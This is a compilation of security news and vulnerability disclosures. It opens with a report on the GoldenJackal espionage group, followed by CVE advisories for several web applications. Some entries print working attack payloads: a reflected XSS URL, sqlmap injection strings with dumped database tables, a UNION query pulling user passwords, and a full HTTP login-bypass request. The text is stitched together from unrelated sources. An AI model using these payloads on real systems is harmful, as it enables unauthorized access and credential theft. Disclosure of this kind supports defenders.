Government and diplomatic entities in the Middle East and South Asia are the target of a new advanced persistent threat actor named GoldenJackal.
Russian cybersecurity firm Kaspersky, which has been keeping tabs on the group's activities since mid-2020, characterized the adversary as both capable and stealthy.
The targeting scope of the campaign is focused on Afghanistan, Azerbaijan, Iran, Iraq,

Government and diplomatic entities in the Middle East and South Asia are the target of a new advanced persistent threat actor named **GoldenJackal**.

Russian cybersecurity firm Kaspersky, which has been keeping tabs on the group's activities since mid-2020, characterized the adversary as both capable and stealthy.

The targeting scope of the campaign is focused on Afghanistan, Azerbaijan, Iran, Iraq, Pakistan, and Turkey, infecting victims with tailored malware that steals data, propagates across systems via removable drives, and conducts surveillance.

GoldenJackal is suspected to have been active for at least four years, although little is known about the group. Kaspersky said it has been unable to determine its origin or affiliation with known threat actors, but the actor's modus operandi suggests an espionage motivation.

What's more, the threat actor's attempts to maintain a low profile and disappear into the shadows bears all the hallmarks of a state-sponsored group.

That said, some tactical overlaps have been observed between the threat actor and Turla, one of Russia's elite nation-state hacking crews. In one stance, a victim machine was infected by Turla and GoldenJackal two months apart.

The exact initial path employed to breach targeted computers is unknown at this stage, but evidence gathered so far points to the use of trojanized Skype installers and malicious Microsoft Word documents.

While the installer serves as a conduit to deliver a .NET-based trojan called JackalControl, the Word files have been observed weaponizing the Follina vulnerability (CVE-2022-30190) to drop the same malware.

JackalControl, as the name indicates, enables the attackers to remotely commandeer the machine, execute arbitrary commands, as well as upload and download from and to the system.

Geography of victims

Some of the other malware families deployed by GoldenJackal are as follows -

*   **JackalSteal** - An implant that's used to find files of interest, including those located in removable USB drives, and transmit them to a remote server.
*   **JackalWorm** - A worm that's engineered to infect systems using removable USB drives and install the JackalControl trojan.
*   **JackalPerInfo** - A malware that comes with features to harvest system metadata, folder contents, installed applications, and running processes, and credentials stored in web browser databases.
*   **JackalScreenWatcher** - A utility to grab screenshots based on a preset time interval and send them to an actor-controlled server.

Another notable aspect of the threat actor is its reliance on hacked WordPress sites as a relay to forward web requests to the actual command-and-control (C2) server by means of a rogue PHP file injected into the websites.

"The group is probably trying to reduce its visibility by limiting the number of victims," Kaspersky researcher Giampaolo Dedola said. "Their toolkit seems to be under development – the number of variants shows that they are still investing in it."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

GoldenJackal: New Threat Group Targeting Middle Eastern and South Asian Governments

EasyImages2.0 ? 2.8.1 is vulnerable to Cross Site Scripting (XSS) via viewlog.php.

**EasyImages2.0 Cross-site scripting(xss) vulnerability****Impact version**

EasyImages2.0 ≤ 2.8.1

**Analysis Report****Vulnerability file**

/app/viewlog.php

When displaying logs, the file directly outputs the log content to the front-end page without taking any preventive measures

**Vulnerability exploitation**

1.Use the JS script for the user parameter on the login page  
  

2.The malicious code is triggered when the admin user views the login log  

**Fixes**

Filter special characters when displaying logs

CVE-2023-33599: EasyImages2.0 Cross-site scripting(xss) vulnerability · Issue #115 · icret/EasyImages2.0

Piwigo 13.6.0 is vulnerable to SQL Injection via /admin/permalinks.php.

Before replicating this vulnerability, you need to first create a new album and access the "photos\_add" function, and choose to create a new album  
  
//like this  

Then,accessing permalinks functionality  

click this  

Select the album you just created and use 'burp' to intercept this request  

You can see this' cat\_id 'parameter, which is where SQL injection exists  

We are trying to add a single quotation mark to trigger an error in MySQL  

We can also directly try using the sleep () function to trigger a delay  

It is not difficult to find that there is an SQL injection here. Next, we will analyze this problem from the code level.  
The vulnerability arises from '/admin/permalinks.php'  
//Start Here  

In our data package, we passed in the "set\_permalink" and “cat\_ Id"parameter, and "cat\_id"is greater than 0, so we can enter this if branch  

Then, because we passed in the 'permalink' parameter, we actually entered the internal else branch  

Then we try to analyze the set\_cat\_permalink() function.（In /admin/include/functions\_permalinks.php）  

In the end, we can find this SQL statement, where '$cat\_id' is passed directly into the SQL statement without any filtering.It is precisely this location that caused SQL injection  

This vulnerability exists in version 13.6.0, and it is uncertain whether this issue exists in earlier versions

CVE-2023-33361: There is a SQL Injection in the "permalinks" function of piwigo · Issue #1910 · Piwigo/Piwigo

Piwigo 13.6.0 is vulnerable to SQL Injection via in the "profile" function.

Accessing the 'profile' page  

Add the 'user\_id' parameter with single quotes  

Discovering an error in MySQL can actually prove the existence of SQL injection, but we can still try using the sleep() function for testing  
  

//Try to analyze how this vulnerability was generated from a code level perspective.  

First find '/admin/profile.php'  

Track build\_user() function (in the /Piwigo/include/functions\_user.inc.php)  

The '$user\_id' enters the getuserdata() function, so continue tracking getuserdata()  

Finally, the '$user\_id' variable will enter this string of SQL statements, which clearly does not filter the incoming parameter values, resulting in SQL injection  

This vulnerability affects the latest version up to 13.6.0, and it is uncertain whether other versions will be affected.

CVE-2023-33362: There is a SQL Injection in the "profile" function of piwigo · Issue #1911 · Piwigo/Piwigo

WBiz Desk version 1.2 suffers from a cross site scripting vulnerability.

    ┌┌───────────────────────────────────────────────────────────────────────────────────────┐││                                     C r a C k E r                                    ┌┘┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                  [ Vulnerability ]                                   ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:  Author   : CraCkEr                                                                    :│  Website  : https://www.codester.com/items/5641/                                       ││  Vendor   : WeBiz Digital                                                              ││  Software : WBiz Desk 1.2                                                              ││  Vuln Type: Reflected XSS                                                              ││  Impact   : Manipulate the content of the site                                         ││                                                                                        ││────────────────────────────────────────────────────────────────────────────────────────││                                                                                       ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:                                                                                        :│  Release Notes:                                                                        ││  ═════════════                                                                         ││  The attacker can send to victim a link containing a malicious URL in an email or      ││  instant message can perform a wide variety of actions, such as stealing the victim's  ││  session token or login credentials                                                    ││                                                                                        │┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                                                                      ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Greets:    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL            CryptoJob (Twitter) twitter.com/0x0CryptoJob     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                    © CraCkEr 2023                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Path: /ticket.phpGET parameter 'tk' is vulnerable to RXSShttp://website/ticket.php?tk=d92h8"><script>alert(1)</script>ygwfb[-] Done

WBiz Desk 1.2 Cross Site Scripting

WBiz Desk version 1.2 suffers from a remote SQL injection vulnerability in the idtk parameter. This is a variant finding from the original discovery of SQL injection in this version attributed to h4ck3r in May of 2023.

    ┌┌───────────────────────────────────────────────────────────────────────────────────────┐││                                     C r a C k E r                                    ┌┘┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                  [ Vulnerability ]                                   ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:  Author   : CraCkEr                                                                    :│  Website  : https://www.codester.com/items/5641/                                       ││  Vendor   : WeBiz Digital                                                              ││  Software : WBiz Desk 1.2                                                              ││  Vuln Type: SQL Injection                                                              ││  Impact   : Database Access                                                            ││                                                                                        ││────────────────────────────────────────────────────────────────────────────────────────││                                                                                       ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:                                                                                        :│ Release Notes:                                                                         ││ ═════════════                                                                          ││                                                                                        ││ SQL injection attacks can allow unauthorized access to sensitive data, modification of ││ data and crash the application or make it unavailable, leading to lost revenue and     ││ damage to a company's reputation.                                                      ││                                                                                        │┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                                                                      ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Greets:    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL            CryptoJob (Twitter) twitter.com/0x0CryptoJob     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                    © CraCkEr 2023                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Path: /ticket.phphttp://website/ticket.php?tk=1&idtk=[SQLi]&action=closeGET parameter 'idtk' is vulnerable to SQL Injection---Parameter: idtk (GET)    Type: boolean-based blind    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause    Payload: tk=1&idtk=1' RLIKE (SELECT (CASE WHEN (8547=8547) THEN 1 ELSE 0x28 END))-- KUTf&action=close    Type: error-based    Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)    Payload: tk=1&idtk=1' OR (SELECT 3964 FROM(SELECT COUNT(*),CONCAT(0x71706b7171,(SELECT (ELT(3964=3964,1))),0x7178787171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- kned&action=close    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: tk=1&idtk=1' AND (SELECT 9716 FROM (SELECT(SLEEP(5)))OGEN)-- uSzC&action=close---[+] Starting the Attackfetching current databasecurrent database: 'wbizdesk_*****_com_br'fetching tables[12 tables]+----------------+| accounts       || category       || chat           || config         || customers      || departments    || email_template || log_tb         || messages       || tickets        || tutorial       || users          |+----------------+fetching columns for table 'customers'[19 columns]+--------------+-------------------+| Column       | Type              |+--------------+-------------------+| name         | varchar(160)      || number       | varchar(11)       || status       | enum('S','B','N') || address      | varchar(255)      || city         | varchar(160)      || company      | varchar(160)      || country      | varchar(60)       || cpf_cnpj     | varchar(60)       || email        | varchar(255)      || id           | int(11)           || ip           | varchar(90)       || neighborhood | varchar(160)      || obs          | text              || os           | varchar(160)      || pass         | varchar(160)      || phrase       | varchar(160)      || salt         | varchar(255)      || state        | varchar(160)      || zipcode      | varchar(60)       |+--------------+-------------------+[-] Done

WBiz Desk 1.2 SQL Injection

Affiliate Me version 5.0.1 suffers from a remote SQL injection vulnerability.

    [#] Exploit Title: Affiliate Me Version 5.0.1 - SQL Injection[#] Exploit Date: May 16, 2023.[#] CVSS 3.1: 6.4 (Medium)[#] CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N[#] Tactic: Initial Access (TA0001)[#] Technique: Exploit Public-Facing Application (T1190)[#] Application Name: Affiliate Me[#] Application Version: 5.0.1[#] Vendor: https://www.powerstonegh.com/[#] Author: h4ck3r - Faisal Albuloushi[#] Contact: SQL@hotmail.co.uk[#] Blog: https://www.0wl.tech[#] 3xploit:[path]/admin.php?show=reply&id=[Injected Query][#] 3xample:[path]/admin.php?show=reply&id=-999' Union Select 1,2,3,4,5,6,7,8,9,concat(ID,0x3a,USERNAME,0x3a,PASSWORD),11,12,13,14,15,16 from users-- -[#] Notes:- Affiliate admin can exploit this vulnerability to escalate his privileges to super admin.

Affiliate Me 5.0.1 SQL Injection

Old Age Home Management 1.0 is vulnerable to SQL Injection via the username parameter.

The username parameter appears to be vulnerable to SQL injection attacks. The payloads nu11secur1ty' or 1=1# or nu11secur1ty%27+or+1%3D1%23 were each submitted in the username parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way. The attacker easily can take control over the admin account and then everything will be lost for this app and the users who are using it.

POST /oahms/admin/login.php HTTP/1.1
Host: pwnedhost.com
Cookie: PHPSESSID\=n8igimmg4o7ddmpnbfueujouvg
Content\-Length: 62
Cache\-Control: max\-age\=0
Sec\-Ch\-Ua: "Not:A-Brand";v\="99", "Chromium";v\="112"
Sec\-Ch\-Ua\-Mobile: ?0
Sec\-Ch\-Ua\-Platform: "Windows"
Upgrade\-Insecure\-Requests: 1
Origin: https://pwnedhost.com
Content\-Type: application/x\-www\-form\-urlencoded
User\-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.138 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://pwnedhost.com/oahms/admin/login.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
username=nu11secur1ty%27+or+1%3D1%23&password=password&submit=

HTTP/1.1 200 OK
Date: Sat, 29 Apr 2023 05:32:07 GMT
Server: Apache/2.4.54 (Win64) OpenSSL/1.1.1p PHP/8.2.0
Content-Security-Policy: upgrade-insecure-requests;
X-Powered-By: PHP/8.2.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13518

<!DOCTYPE html>
<html lang="en">

<head>
  
  <title>Old Age Home Management System|| Dashboard</title>
  
  <link rel="stylesheet" href="vendors/typicons/typicons.css">
  <link rel="stylesheet" href="vendors/css/vendor.bundle.base.css">
  <link rel="stylesheet" href="css/vertical-layout-light/style.css">
  
  
</head>

CVE-2023-33338: CVE-nu11secur1ty/vendors/ANUJ-KUMAR/Old-Age-Home-Management-2022-2023-1.0 at main · nu11secur1ty/CVE-nu11secur1ty

WebPlus Pro v1.4.7.8.4-01 is vulnerable to Incorrect Access Control.

\[CVE ID\]

CVE-2020-20012

\[PRODUCT\]

WebPlus Pro

\[VERSION\]

v1.4.7.8.4-01

\[Vulnerability Type\]

Incorrect Access Control

\[DESCRIPTION\]

WebPlus Pro v1.4.7.8.4-01 is vulnerable to Incorrect Access Control.

\[CVE ID\]

CVE-2023-31814

\[PRODUCT\]

D-Link DIR-300

\[VERSION\]

firmware<=REVA1.06,<=REVB2.06

\[Vulnerability Type\]

File inclusion

\[DESCRIPTION\]

D-Link DIR-300 firmware <=REVA1.06 and <=REVB2.06 is vulnerable to File inclusion via /model/\_\_lang\_msg.php.

CVE-2020-20012: CVE

SolarView Compact <= 6.0 is vulnerable to Insecure Permissions. Any file on the server can be read or modified because texteditor.php is not restricted.

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?

Tag

#php